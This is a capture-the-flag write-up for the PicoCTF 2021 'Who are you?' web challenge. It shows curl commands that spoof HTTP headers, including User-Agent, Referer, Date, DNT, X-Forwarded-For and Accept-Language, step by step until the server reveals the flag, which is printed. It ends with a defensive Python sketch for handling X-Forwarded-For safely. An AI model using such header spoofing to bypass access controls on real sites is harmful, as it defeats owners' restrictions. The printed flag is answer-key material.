PicoCTF-2021 Writeup

Who are you?

Last updated 2 years ago

Problem

Let me in. Let me iiiiiiinnnnnnnnnnnnnnnnnnnn

Solution

  1. Resources: HTTP RFC / MDN HTTP Headers / Language Code Table / Sweden IP Address Ranges

  2. curl http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> Only people who use the official PicoBrowser are allowed on this site!

  3. curl --user-agent "picobrowser" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> I don&#39;t trust users visiting from another site.

  4. curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> Sorry, this site only worked in 2018.

  5. curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> I don&#39;t trust users who can be tracked.

  6. curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> This website is only for people from Sweden.

  7. curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> You&#39;re in Sweden but you don&#39;t speak Swedish?

  8. curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> What can I say except, you are welcome

  9. Final command: curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" http://mercury.picoctf.net:38322/ | grep "<b>.*</b>" --> picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}
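
Every gate in steps 2 through 8 keys on a request header that the client sets freely; the one with a standard server-side fix is X-Forwarded-For. The Python sketch below is an added example, not code from the challenge or from this writeup: `naive_client_ip` models the behaviour observed in step 7, and `hardened_client_ip` honours the header only when the TCP peer is a proxy in a trusted range. The function names, the 10.0.0.0/8 proxy range and the 203.0.113.7 / 10.0.0.5 addresses are assumptions made for illustration.

```python
import ipaddress

# Assumption: our own reverse proxies live in this range (hypothetical).
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

def is_trusted(addr):
    ip = ipaddress.ip_address(addr)  # raises ValueError on malformed input
    return any(ip in net for net in TRUSTED_PROXIES)

def naive_client_ip(headers, peer_addr):
    """Model of the behaviour seen in step 7: believe the header outright."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else peer_addr

def hardened_client_ip(headers, peer_addr):
    """Use X-Forwarded-For only for hops appended by proxies we operate."""
    if not is_trusted(peer_addr):
        # Direct connection: the header is client-supplied, so ignore it.
        return peer_addr
    raw = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in raw.split(",") if h.strip()]
    # Walk right to left: each trusted proxy appended the address it saw,
    # so the first untrusted hop from the right is the real client.
    for hop in reversed(hops):
        try:
            if not is_trusted(hop):
                return hop
        except ValueError:
            return peer_addr  # malformed entry: fall back to the socket peer
    return peer_addr

# Constructed sample requests (not captured traffic).
SPOOFED = {"X-Forwarded-For": "2.71.255.255"}   # step 7's header, sent directly
DIRECT_PEER = "203.0.113.7"                      # address the socket really sees
# Same client behind our proxy: the proxy appended the real peer on the right.
VIA_PROXY = {"X-Forwarded-For": "2.71.255.255, 203.0.113.7"}
PROXY_PEER = "10.0.0.5"

if __name__ == "__main__":
    for name, hdrs, peer in (("direct", SPOOFED, DIRECT_PEER),
                             ("via proxy", VIA_PROXY, PROXY_PEER)):
        print(name, "naive:", naive_client_ip(hdrs, peer),
              "hardened:", hardened_client_ip(hdrs, peer))
```

The other headers in the chain (User-Agent, Referer, Date, DNT, Accept-Language) have no equivalent trusted source, so they can inform presentation but not an access decision.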

Flag

picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}

http://mercury.picoctf.net:38322/
HTTP RFC
MDN HTTP Headers
Language Code Table
Sweden IP Address Ranges